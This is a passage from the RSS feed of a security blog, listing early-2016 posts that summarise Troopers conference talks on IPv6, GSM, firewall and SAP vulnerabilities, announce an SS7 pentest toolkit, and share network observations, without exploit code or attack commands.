has a lab for testing devices. The communication with clinicians is very important for his work, so he visits hospitals with his student so that they can learn how the process works on the inside.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Security Summit – Track 2</title>
      <link>https://insinuator.net/2016/03/ipv6-security-summit-track-2/</link>
      <pubDate>Tue, 29 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/ipv6-security-summit-track-2/</guid>
      <description>&lt;p&gt;The Troopers experience will never be the same without the “&lt;a href=&#34;https://www.troopers.de/ipv6-security-summit/&#34;&gt;IPv6 summit&lt;/a&gt;”. It is one of kind of two-day special event where different security experts gather to discuss IPv6 current challenges. It addresses different topics ranging from a broad introduction of the IPv6 to how secure the protocol  is and what  the latest standards are.&lt;/p&gt;&#xA;&lt;p&gt;The summit is divided into 2 different tracks that run simultaneously. For the first day on the second track, &lt;em&gt;Christopher Werny&lt;/em&gt; and &lt;em&gt;Rafael Schaefer&lt;/em&gt; have carried out the first three sessions.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 16 USB Condom</title>
      <link>https://insinuator.net/2016/03/troopers-16-usb-condom/</link>
      <pubDate>Tue, 29 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/troopers-16-usb-condom/</guid>
      <description>&lt;p&gt;At times with many many digitally transmittable diseases, protection might be more important than ever. When connecting your smartphone to a rogue charger, or a foreign smartphone to your own laptop, you never now what will happen. You never know what data crosses the lines. But there is help: A USB condom!&lt;/p&gt;&#xA;&lt;p&gt;As the &lt;a href=&#34;https://www.insinuator.net/2016/03/troopers-16-taking-the-badge-to-yet-another-level/&#34;&gt;Troopers 16 Badge&lt;/a&gt; was a neat integrated device, we had the challenge to identify something to be soldered for our attendees. The past has shown, that soldering rocks and all of our attendees, &lt;em&gt;all of you&lt;/em&gt;, really enjoy it! After some looking around and roaming the Internet, we decided to go for a simple device, which would protect you and your devices in a hostile world. A slim PCB, which will protect your phone when having to connect it to some unknown charger or for situations when “a mate” just wants to connect his/her phone to your laptop for “charging purposes”.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 16: Wireshark in IP version 6</title>
      <link>https://insinuator.net/2016/03/troopers-16-wireshark-in-ip-version-6/</link>
      <pubDate>Tue, 29 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/troopers-16-wireshark-in-ip-version-6/</guid>
      <description>&lt;p&gt;Wireshark in IP version 6 workshop was a part of IPv6 summit sessions of Troopers 16. It was held by Jeffery Carrell on the second day of IPv6 summit on Tuesday, the 15th of March.  The workshop was generally divided into two sections: a short introduction to IPv6 and analyzing some IPv6 packets on Wireshark.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;Introduction to IPv6&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;IPv6 protocol was defined at the end of 1990’s, mainly to provide a huge address pool after realizing that the world would run out of IPv4 addresses quickly. The work on IPv6 started before the introduction of NAT and Private addressing to IPv4, which are considered temporary solutions of IPv4 address shortage problem. IPv6 address consists of 128 bits, divided into 8 groups called &lt;em&gt;nibbles&lt;/em&gt;, &lt;em&gt;quibbles&lt;/em&gt; or &lt;em&gt;hextets&lt;/em&gt; separated by colons. Each nibble consists of four hexadecimal digits. The 128 bits address length provides 340 trillion trillion trillion addresses. An IPv6 address is divided into two parts: the left part is the network identifier while the right one is the host identifier. The default prefix is /64 which divided the IP address into two halves. An IPv6 address looks as follows: 2001:0db8:1010:61ab:f005:ba11:00da:11a5/64&lt;/p&gt;</description>
    </item>
    <item>
      <title>Attacking Next-Generation Firewalls</title>
      <link>https://insinuator.net/2016/03/attacking-next-generation-firewalls/</link>
      <pubDate>Mon, 28 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/attacking-next-generation-firewalls/</guid>
      <description>&lt;p&gt;Felix Wilhelm presented in his talk various ways to attack his new target – The PA-500 which is produced by Palo Alto Networks.&lt;/p&gt;&#xA;&lt;p&gt;He discovered vulnerabilities in 3 different exposed aspects of the device. The first vulnerability occurred inside of an unauthenticated API from the Management-Website which could only be accessed within the Admin Network. This vulnerability was a typical off-by-one Command Injection, which could be abused by reaching out to the API with a special client=wget Request.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SDR and non-SDR tools for reverse engineering wireless systems</title>
      <link>https://insinuator.net/2016/03/sdr-and-non-sdr-tools-for-reverse-engineering-wireless-systems/</link>
      <pubDate>Mon, 28 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/sdr-and-non-sdr-tools-for-reverse-engineering-wireless-systems/</guid>
      <description>&lt;p&gt;Hey there!&lt;br&gt;&#xA;The God of frequencies Michael Ossmann visited us again this year at the &lt;a href=&#34;https://www.troopers.de/troopers16/&#34;&gt;TROOPERS16&lt;/a&gt; and showed us how to break another device using a specific setup.&lt;/p&gt;&#xA;&lt;p&gt;Last time he introduced the HackRF One to us (Read here:&lt;a href=&#34;https://www.insinuator.net/2014/08/hackrf-one-the-story-continues/&#34;&gt;https://www.insinuator.net/2014/08/hackrf-one-the-story-continues/&lt;/a&gt;), but this post is a short summary of his talk about “Rapid Radio Reversing”, he is a wireless security researcher, who makes hardware for hackers. Best known for the HackRF, Ubertooth, and Daisho projects, he founded Great Scott Gadgets in an effort to put exciting, new tools into the hands of innovative people.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Security Evaluation of Dual-Stack Systems [Troopers 2016 recap] (Part 1)</title>
      <link>https://insinuator.net/2016/03/security-evaluation-of-dual-stack-systems-troopers-2016-recap-part-1/</link>
      <pubDate>Mon, 28 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/security-evaluation-of-dual-stack-systems-troopers-2016-recap-part-1/</guid>
      <description>&lt;p&gt;Dear Readers of Insinuator,&lt;/p&gt;&#xA;&lt;p&gt;**tldr;**This blogpost presents a measurement study of a current security state regarding to open ports on a direct comparison of IPv4 and IPv6. The study analyses almost 58,000 dual-stacked domains in order to find discrepancies in applied security policies. We further discuss the potential reasons and, more importantly, the implications of the identified differences. &lt;strong&gt;\tldr;&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;For those of you who couldn’t participate at Troopers Conference 2016 in Heidelberg or watch my talk at the IPv6 Security Summit, I want to recap some of the most important parts of my research in this blogpost.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Joy of Sandbox Mitigations</title>
      <link>https://insinuator.net/2016/03/the-joy-of-sandbox-mitigations/</link>
      <pubDate>Mon, 28 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/the-joy-of-sandbox-mitigations/</guid>
      <description>&lt;p&gt;This year at TROOPERS16 in Heidelberg we welcomed James Forshaw for his talk about “&lt;a href=&#34;https://www.troopers.de/events/troopers16/644_the_joy_of_sandbox_mitigations/&#34;&gt;The Joy of Sandbox Mitigations&lt;/a&gt;“.&lt;/p&gt;&#xA;&lt;p&gt;He is a security researcher in Google’s Project Zero. He has been involved with computer hardware and software security for over 10 years looking at a range of different platforms and applications. With a great interest in logical vulnerabilities he has numerous disclosures in a wide range of products from web browsers to virtual machine breakouts as well as being a Pwn2Own and Microsoft Mitigation Bypass bounty winner. He has spoken at a number of security conferences including Black Hat USA, CanSecWest, Bluehat, HITB, and Infiltrate.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Reflections on the IPv6-only WiFi Experience during Troopers</title>
      <link>https://insinuator.net/2016/03/reflections-on-the-ipv6-only-wifi-experience-during-troopers/</link>
      <pubDate>Fri, 25 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/reflections-on-the-ipv6-only-wifi-experience-during-troopers/</guid>
      <description>&lt;p&gt;Hello,&lt;/p&gt;&#xA;&lt;p&gt;Troopers is (unfortunately) over. It was a blast (but I may be biased ;-))! After things have settled, I want to take the opportunity to reflect my thoughts and impressions on the IPv6-only WiFi we had deployed during the conference. To make sure that everybody is on the same page let’s start at the beginning.&lt;/p&gt;&#xA;&lt;p&gt;In the last couple of years we had provided Dual-Stack connectivity on the main “Troopers” SSID but also had an additional IPv6-only SSID. This year we decided to spice things up and made the “Troopers“ SSID IPv6-only (with NAT64) while providing Dual-Stack connectivity on the “Legacy“ SSID. We wanted to get a feeling how many clients and applications can work properly in an IPv6-only environment. We intentionally didn’t announce it vastly beforehand, hoping that attendees would just connect to the main SSID without noticing anything. We were aware that some applications might expose issues but, as I said , we wanted to get a feeling to which degree problems actually occured.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Classic Web Vulns Found in Google Search Appliance 7.4</title>
      <link>https://insinuator.net/2016/03/classic-web-vulns-found-in-google-search-appliance-7.4/</link>
      <pubDate>Wed, 23 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/classic-web-vulns-found-in-google-search-appliance-7.4/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://www.google.com/intx/en/work/search/products/gsa.html&#34;&gt;&lt;img src=&#34;https://www.insinuator.net/wp-content/uploads/2016/03/servers-300x156.png&#34; alt=&#34;Google Search Appliances&#34;&gt;&lt;/a&gt;Hi all,&lt;/p&gt;&#xA;&lt;p&gt;I’ve recently found some sort of classic web vulnerabilities in the Google Search Appliance (GSA) and as they are now fixed [0][1][2], I’d like to share them with you.&lt;/p&gt;&#xA;&lt;p&gt;First of all, some infrastructure details about the GSA itself. The GSA is used by companies to apply the Google search algorithms to their internal documents without publishing them to cloud providers. To accomplish this task, the GSA provides multiple interfaces including a search interface, an administrative interface and multiple interfaces to index the organization’s data.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers 16 – Taking the Badge to yet Another Level!</title>
      <link>https://insinuator.net/2016/03/troopers-16-taking-the-badge-to-yet-another-level/</link>
      <pubDate>Sun, 20 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/troopers-16-taking-the-badge-to-yet-another-level/</guid>
      <description>&lt;p&gt;Real men used to wear pink pagers, but that’s the past and recently it was time for Troopers 16. Meaning: Real Troopers wear awesome Badges! And, from the feedback we got, they did!&lt;br&gt;&#xA;Troopers might be over, but the era of the TR16 Badge is seemingly just beginning. As such, here’s a quick insight into the badge!&lt;/p&gt;&#xA;&lt;p&gt;To start, this is the first of (at least) three blogposts covering the badge. As we’re currently in the middle of stripping and cleaning our source code repository, this post now will not cover the firmware. The stripping is not about hiding something, but as we used an Open Source &lt;a href=&#34;https://en.wikipedia.org/wiki/Real-time_operating_system&#34;&gt;RTOS&lt;/a&gt; our repo currently contains modules, which are for completely other architectures.&lt;br&gt;&#xA;In addition we needed a few workarounds while getting the badge up and running for the conference, following our own hacking sessions, there will be a dedicated post concerned with hardware modifications and hacks which can be performed.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers16 – GSM Network</title>
      <link>https://insinuator.net/2016/03/troopers16-gsm-network/</link>
      <pubDate>Wed, 16 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/troopers16-gsm-network/</guid>
      <description>&lt;p&gt;Hello Troopers!&lt;/p&gt;&#xA;&lt;p&gt;only a few seconds left! As a short reminder, there is a GSM network running on Troopers 2016. It should be available in the whole building. To attend the network you need to&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Get a SIM Card @Troopers_Desk&lt;/li&gt;&#xA;&lt;li&gt;Put it in your phone&lt;/li&gt;&#xA;&lt;li&gt;Start the phone&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;That’s it!&lt;/p&gt;&#xA;&lt;p&gt;You can always dial &lt;strong&gt;*#100#&lt;/strong&gt; to get your phone number. All further information (and a phonebook) you’ll find on gsm.troopers.de, but here again a brief summary:&lt;/p&gt;</description>
    </item>
    <item>
      <title>Check your SAP landscape for default Solution Manager users</title>
      <link>https://insinuator.net/2016/03/check-your-sap-landscape-for-default-solution-manager-users/</link>
      <pubDate>Thu, 10 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/check-your-sap-landscape-for-default-solution-manager-users/</guid>
      <description>&lt;p&gt;This is a guest post from Joris van de Vis &lt;a href=&#34;https://twitter.com/jvis&#34;&gt;@jvis&lt;/a&gt;,  on his upcoming Troopers &lt;a href=&#34;https://www.troopers.de/events/troopers16/603_an_easy_way_into_your_multi-million_dollar_sap_systems_an_unknown_default_sap_account/&#34;&gt;talk&lt;/a&gt;. Additional credits go to: Robin Vleeschhouwer, and Fred van de Langenberg.&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt; &lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;https://www.insinuator.net/wp-content/uploads/2016/03/Picture1.png&#34; alt=&#34;Picture1&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;As &lt;a href=&#34;https://www.troopers.de/events/troopers16/603_an_easy_way_into_your_multi-million_dollar_sap_systems_an_unknown_default_sap_account/&#34;&gt;presented at Troopers&lt;/a&gt; this year, ERP-SEC research has uncovered a set of potential default accounts related to the use of SAP Solution Manager. These default accounts might pose a big risk to your SAP supported business as some of them have wide authorisations. It is therefore important to check if they exist in your landscape and change the default passwords.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Cloud Security &amp; Trust</title>
      <link>https://insinuator.net/2016/03/cloud-security-trust/</link>
      <pubDate>Thu, 10 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/cloud-security-trust/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;I gave a presentation on Cloud Security, Compliance &amp;amp; Trust the other day. The basic message was to look beyond the Cloud buzzword and see the actual technologies which are used, understand which security principles still apply and which need to be re-thought, giving a rough direction about regulatory compliance in Cloud environments (which of course is non-binding, as I’m not a lawyer), and the importance of trust evaluations (especially) when it comes to Cloud services.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Docker, DevOps &amp; Security</title>
      <link>https://insinuator.net/2016/03/docker-devops-security/</link>
      <pubDate>Thu, 10 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/docker-devops-security/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;this week I gave a presentation together with &lt;a href=&#34;https://twitter.com/der_Cthulhu&#34;&gt;Florian Barth&lt;/a&gt; from &lt;a href=&#34;http://stocardapp.com/&#34;&gt;Stocard&lt;/a&gt; on Docker, DevOps/Microservices, and Security — a topic and collaboration that I will definitely cover in even more detail in the future!&lt;/p&gt;&#xA;&lt;p&gt;The slides can be found &lt;a href=&#34;https://www.ernw.de/download/ERNW_Stocard_Docker-Devops-Security_fbarth-mluft.pdf&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;so long,&lt;/p&gt;&#xA;&lt;p&gt;Matthias&lt;/p&gt;</description>
    </item>
    <item>
      <title>TelcoSecDay 2016 – Final Agenda and more</title>
      <link>https://insinuator.net/2016/03/telcosecday-2016-final-agenda-and-more/</link>
      <pubDate>Thu, 10 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/telcosecday-2016-final-agenda-and-more/</guid>
      <description>&lt;p&gt;Only a few days left until Troopers! I’d like to use this chance to publish the final agenda of &lt;a href=&#34;https://www.troopers.de/events/troopers16/580_telcosecday_2016_invitation_only/&#34;&gt;TelcoSecDay 2016&lt;/a&gt;. We will start around 8:30am and will finish at about 6:15pm. After this, we will have a shared dinner in the historic center of Heidelberg. The exact location will be announced during the TSD.&lt;/p&gt;&#xA;&lt;p&gt;8:30: Opening Remarks&lt;br&gt;&#xA;9:00: &lt;a href=&#34;https://www.troopers.de/events/troopers16/606_telcosecday_new_age_phreacking_magic_tricks_for_wholesale_fraud/&#34;&gt;David Batanero – New Age Phreaking: Magic tricks for wholesale fraud&lt;/a&gt;&lt;br&gt;&#xA;9:45: &lt;a href=&#34;https://www.troopers.de/events/troopers16/657_towards_carrier_based_imsi_catcher_detection/&#34;&gt;Adrian Dabrowski – Towards Carrier Based IMSI Catcher Detection&lt;/a&gt;&lt;br&gt;&#xA;10:30: Break&lt;br&gt;&#xA;11:00: &lt;a href=&#34;https://www.troopers.de/events/troopers16/653_assaulting_ipx_diameter_roaming_network/&#34;&gt;Alexandre De Oliveira – Assaulting IPX Diameter roaming networks&lt;/a&gt;&lt;br&gt;&#xA;11:45: &lt;a href=&#34;https://www.troopers.de/events/troopers16/654_the_known_unknowns_of_ss7_and_beyond/&#34;&gt;Rao Siddharth – The known and unknowns of SS7 and beyond&lt;/a&gt;&lt;br&gt;&#xA;12:30: &lt;a href=&#34;https://www.troopers.de/events/troopers16/652_rucki_zucki_scanning_tool/&#34;&gt;Joao Collier de Mendonca – “rucki zucki” scanning tool&lt;/a&gt;&lt;br&gt;&#xA;13:00: Lunch&lt;br&gt;&#xA;14:00: &lt;a href=&#34;https://www.troopers.de/events/troopers16/658_open_source_network_elements_for_security_analysis_of_mobile_networks/&#34;&gt;Harald Welte – Open Source Network Elements for Security Analysis of Mobile Networks&lt;/a&gt;&lt;br&gt;&#xA;14:45: &lt;a href=&#34;https://www.troopers.de/events/troopers16/659_advance_apt_attribution_for_researchers/&#34;&gt;Rahul Sasi – Advance APT Attribution for researchers&lt;/a&gt;&lt;br&gt;&#xA;15:30: Break&lt;br&gt;&#xA;16:00: &lt;a href=&#34;https://www.troopers.de/events/troopers16/660_dont_connect_to_my_4g_base_station_investigating_info_leaks_in_4g_basebands/&#34;&gt;Ravi and Altaf Shaik – Don’t connect to my 4G base station: investigating info leaks in 4G basebands&lt;/a&gt;&lt;br&gt;&#xA;16:45: Talk from some guy with interest in telco sec&lt;br&gt;&#xA;17:15: Break&lt;br&gt;&#xA;17:30: &lt;a href=&#34;https://www.troopers.de/events/troopers16/662_observations_on_mobile_communication_platforms/&#34;&gt;Dieter Spaar – Observations on mobile communication platforms&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Troopers16 – GSM Network</title>
      <link>https://insinuator.net/2016/03/troopers16-gsm-network/</link>
      <pubDate>Thu, 03 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/troopers16-gsm-network/</guid>
      <description>&lt;p&gt;Same as &lt;a href=&#34;https://www.insinuator.net/2015/03/gsmtroopers/&#34;&gt;last year&lt;/a&gt;, we will have a GSM based telephony network running at Troopers 2016. The network will be a closed network, which means it only can be used with Troopers SIM cards and between Troopers attendees only. You can use the network for&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;doing Voice Calls&lt;/li&gt;&#xA;&lt;li&gt;send Short Messages (SMS)&lt;/li&gt;&#xA;&lt;li&gt;have Internet Access&lt;/li&gt;&#xA;&lt;li&gt;submit Challenge Tokens (see below)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;In contrast to last year, you will need a Troopers SIM card to attend the network with your cellphone. The SIM cards will be handed out at the registration desk; if you have questions you always can contact me or Kevin Redon (thanks again for assisting us).&lt;/p&gt;</description>
    </item>
    <item>
      <title>How to crack a white-box without much effort</title>
      <link>https://insinuator.net/2016/03/how-to-crack-a-white-box-without-much-effort/</link>
      <pubDate>Wed, 02 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/how-to-crack-a-white-box-without-much-effort/</guid>
      <description>&lt;p&gt;&lt;strong&gt;By: Philippe Teuwen (&lt;a href=&#34;http://twitter.com/doegox&#34;&gt;@doegox&lt;/a&gt;)&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;White-box cryptography is a relatively new field that aims at enabling safely cryptographic operations in hostile situations.&lt;br&gt;&#xA;A typical example is its use in digital-right management (DRM) schemes, but nowadays you also find white-box implementations in mobile applications such as Host Card Emulation (HCE) and the protection of credentials to the cloud.&lt;br&gt;&#xA;In all these use-cases the software implementation uses the secret key of a third-party which should remain secret from the owner of the device which is running this executable.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Multicast Based IPv6 Neighbor Spoofing / Response Behavior on Cisco Devices</title>
      <link>https://insinuator.net/2016/03/multicast-based-ipv6-neighbor-spoofing-/-response-behavior-on-cisco-devices/</link>
      <pubDate>Tue, 01 Mar 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/03/multicast-based-ipv6-neighbor-spoofing-/-response-behavior-on-cisco-devices/</guid>
      <description>&lt;p&gt;Dear readers,&lt;/p&gt;&#xA;&lt;p&gt;today we want to examine the behavior of Cisco devices when they receive spoofed IPv6 Neighbor Advertisement packets from an untrusted system pretending to be the default router for the local segment. We start with a quick refresher how Cisco devices behave in the legacy (IPv4) world when they receive a spoofed broadcast ARP packet containing the IP address of the device but with a different MAC address, followed by a discussion of the corresponding behavior in the IPv6 world.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How to test Kerberos authenticated web applications?</title>
      <link>https://insinuator.net/2016/02/how-to-test-kerberos-authenticated-web-applications/</link>
      <pubDate>Thu, 18 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/how-to-test-kerberos-authenticated-web-applications/</guid>
      <description>&lt;p&gt;First of all: This is not an in-depth Kerberos how-to, nor is this tutorial about the different aspects of web application testing. This tutorial is just to give support in testing Kerberos authenticated web applications. The goal is to hand over the right tools and steps to be able to perform the configuration and be able to test the application.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;When to use it?&lt;/strong&gt;&lt;br&gt;&#xA;When there is a 401 server response with the header “WWW-Authenticate: Negotiate”. This can either mean Kerberos or NTLM authentication is needed. It is possible to distinguish them by looking at valid authenticated client traffic. As a simple reminder: The NTLM Authorization header will always start with the value “TlRM…”, the Kerberos Authorization header will always start with “YII…”. For further information this &lt;a href=&#34;http://blogs.technet.com/b/tristank/archive/2006/08/02/negotiate-this.aspx&#34;&gt;link&lt;/a&gt; is recommend.&lt;br&gt;&#xA;In this tutorial the term “Kerberos authentication” will be used. There are other terms sometimes used like SPNEGO, SSO or integrated authentication.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Dual Stack vs. IPv6-only in Enterprise Networks</title>
      <link>https://insinuator.net/2016/02/dual-stack-vs.-ipv6-only-in-enterprise-networks/</link>
      <pubDate>Wed, 17 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/dual-stack-vs.-ipv6-only-in-enterprise-networks/</guid>
      <description>&lt;p&gt;I had the pleasure to sit in Mark Townsley “&lt;a href=&#34;https://clnv.s3.amazonaws.com/2015/usa/pdf/BRKRST-2616.pdf&#34;&gt;Addressing Networking Challenges With Latest Innovations in IPv6&lt;/a&gt;” session at Cisco Live yesterday and – somewhat inevitably – there was a mention of Facebook having implemented an IPv6-only approach in their data centers (&lt;a href=&#34;https://www.youtube.com/watch?v=An7s25FSK0U&#34;&gt;here’s a talk&lt;/a&gt; from Paul Saab/FB laying out details). So, with the &lt;a href=&#34;https://cisco.rainfocus.com/scripts/catalog/cleu16.jsp?search=pnlcrs-2307&#34;&gt;“IPv6 Panel”&lt;/a&gt; looming, I started reflecting on “Why don’t we see this in our customer space?”. This post quickly summarizes some observations and thoughts.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Observations from the Cisco Live Europe 2016 Wifi Infrastructure</title>
      <link>https://insinuator.net/2016/02/observations-from-the-cisco-live-europe-2016-wifi-infrastructure/</link>
      <pubDate>Tue, 16 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/observations-from-the-cisco-live-europe-2016-wifi-infrastructure/</guid>
      <description>&lt;p&gt;Good Evening,&lt;/p&gt;&#xA;&lt;p&gt;Enno and I spent the first day on Cisco Live Europe in Berlin today attending the “Advanced Practical Knowledge for Enterprise Deploying IPv6” technical breakout held by &lt;a href=&#34;https://twitter.com/bckcntryskr&#34;&gt;Tim Martin&lt;/a&gt; and &lt;a href=&#34;https://www.ciscolive.com/online/connect/speakerDetail.ww?PERSON_ID=B87EDE562B1002BDCC3504AD38E52492&#34;&gt;Jim Bailey&lt;/a&gt;. It was a good breakout session, and thanks again Tim for the honorable mention of our work in your slides! We really appreciate it. Like &lt;a href=&#34;https://www.insinuator.net/2015/01/observations-from-the-cisco-live-europe-wifi-infrastructure/&#34;&gt;last year&lt;/a&gt;, we were curious how the Wifi network was setup this year as I face a corresponding task for &lt;a href=&#34;https://www.troopers.de/troopers16/&#34;&gt;Troopers&lt;/a&gt; in March, with some &lt;a href=&#34;https://www.insinuator.net/2016/02/tr16-ipv6-security-summit-teaser-building-a-reliable-and-secure-ipv6-wifi-network/&#34;&gt;major changes&lt;/a&gt; in comparison to the last years. The Wifi infastructure in Berlin looked very similar to the one from last year in Milan, we had the “standard” Cisco Live SSID as well as an IPv6-only (with NAT64 as translation mechanism) SSID. The standard SSID looked identical to last year with the exception that now the &lt;a href=&#34;http://www.cisco.com/c/en/us/td/docs/wireless/controller/technotes/8-0/IPV6_DG.html#pgfId-76925&#34;&gt;RA Throttling&lt;/a&gt; feature on the WLC was active from the beginning! Neither the M nor the O flag are set which means that my client has to use the legacy protocol to resolve AAAA records. As I am running Windows, it does not support &lt;a href=&#34;https://tools.ietf.org/html/rfc6106&#34;&gt;RA option 25 &lt;/a&gt; but the option wasn’t included in the RAs anyway. The preference was configured to the default “medium”. One thing I noticed, but haven’t had a chance to ask &lt;a href=&#34;https://twitter.com/ayourtch&#34;&gt;Andrew Yourtchenko&lt;/a&gt;, was that for the legacy (IPv4) connection they use HSRPv2 as an FHRP protocol (indicated by the MAC address &lt;a href=&#34;http://www.cisco.com/c/en/us/td/docs/ios-xml/ios/ipapp_fhrp/configuration/xe-3s/fhp-xe-3s-book/fhp-hsrp-v2.html&#34;&gt;00:00:0c:9f:f0:01&lt;/a&gt; I received from the gateway) but for IPv6 I received Router Advertisements from two different MAC addresses (which both belong to Cisco, so I don’t think anyone sent spoofed RAs).  I am curious about the reasoning for this approach 🙂&lt;br&gt;&#xA;What i also encountered was that the Peer-to-Peer Blocking feature was apparently not enabled on the SSID as I was able to enumerate approx. 1600 active clients at the time. No worries, I haven’t done anything else, just was curious whether the feature was activated or not…&lt;/p&gt;</description>
    </item>
    <item>
      <title>ss7MAPer – A SS7 pen testing toolkit</title>
      <link>https://insinuator.net/2016/02/ss7maper-a-ss7-pen-testing-toolkit/</link>
      <pubDate>Tue, 16 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/ss7maper-a-ss7-pen-testing-toolkit/</guid>
      <description>&lt;p&gt;While running some SS7 pentests last year, I developed a small tool automating some of the well-known SS7 attack cases. Today I’m releasing the first version of ss7MAPer, a &lt;a href=&#34;https://en.wikipedia.org/wiki/Signalling_System_No._7&#34;&gt;SS7&lt;/a&gt; &lt;a href=&#34;https://en.wikipedia.org/wiki/Mobile_Application_Part%20&#34;&gt;MAP&lt;/a&gt; (pen-)testing toolkit.&lt;/p&gt;&#xA;&lt;p&gt;The toolkit is build upon the &lt;a href=&#34;http://cgit.osmocom.org/erlang/osmo_ss7/&#34;&gt;Osmocom SS7 stack&lt;/a&gt; and implements some basic MAP messages. At its current state tests against the &lt;a href=&#34;https://en.wikipedia.org/wiki/Home_Location_Register&#34;&gt;HLR&lt;/a&gt; are ready for use, in future versions tests against &lt;a href=&#34;https://en.wikipedia.org/wiki/Visitor_Location_Register&#34;&gt;VLR&lt;/a&gt;, &lt;a href=&#34;https://en.wikipedia.org/wiki/Network_switching_subsystem&#34;&gt;MSC&lt;/a&gt; and &lt;a href=&#34;https://en.wikipedia.org/wiki/Short_message_service_center&#34;&gt;SMSC&lt;/a&gt; will follow.&lt;/p&gt;&#xA;&lt;p&gt;The source code of the tool is published on &lt;a href=&#34;https://github.com/ernw/ss7MAPer&#34;&gt;github&lt;/a&gt;, feel free to use and extend.&lt;/p&gt;</description>
    </item>
    <item>
      <title>IPv6 Address Planning in 2016 / Observations</title>
      <link>https://insinuator.net/2016/02/ipv6-address-planning-in-2016-/-observations/</link>
      <pubDate>Sun, 14 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/ipv6-address-planning-in-2016-/-observations/</guid>
      <description>&lt;p&gt;Hi,&lt;/p&gt;&#xA;&lt;p&gt;I’ll be on the “&lt;a href=&#34;https://cisco.rainfocus.com/scripts/catalog/cleu16.jsp?search=pnlcrs-2307&#34;&gt;IPv6 Panel&lt;/a&gt;” at &lt;a href=&#34;http://www.ciscolive.com/emea/&#34;&gt;Cisco Live&lt;/a&gt; next week and somewhat in preparation I started thinking about what we currently see when it comes to IPv6 deployment in our customer space. We notably observe a large gap between “textbook planning &amp;amp; transition strategies” and what’s happening in real-life in those organizations. I hence decided to write down some of these observations in a quick series of posts to be published in the upcoming days and, maybe more importantly, to reflect on the reasoning of this apparent mismatch between theory and practice. I dare to add a dose of devil’s advocate here+there…&lt;br&gt;&#xA;For today let’s start with some comments on IPv6 address planning.&lt;/p&gt;</description>
    </item>
    <item>
      <title>#TR16 IPv6 Security Summit Teaser: Basic IPv6 Attacks &amp; Defenses Workshop</title>
      <link>https://insinuator.net/2016/02/%23tr16-ipv6-security-summit-teaser-basic-ipv6-attacks-defenses-workshop/</link>
      <pubDate>Sat, 13 Feb 2016 00:00:00 +0000</pubDate>
      <guid>https://insinuator.net/2016/02/%23tr16-ipv6-security-summit-teaser-basic-ipv6-attacks-defenses-workshop/</guid>
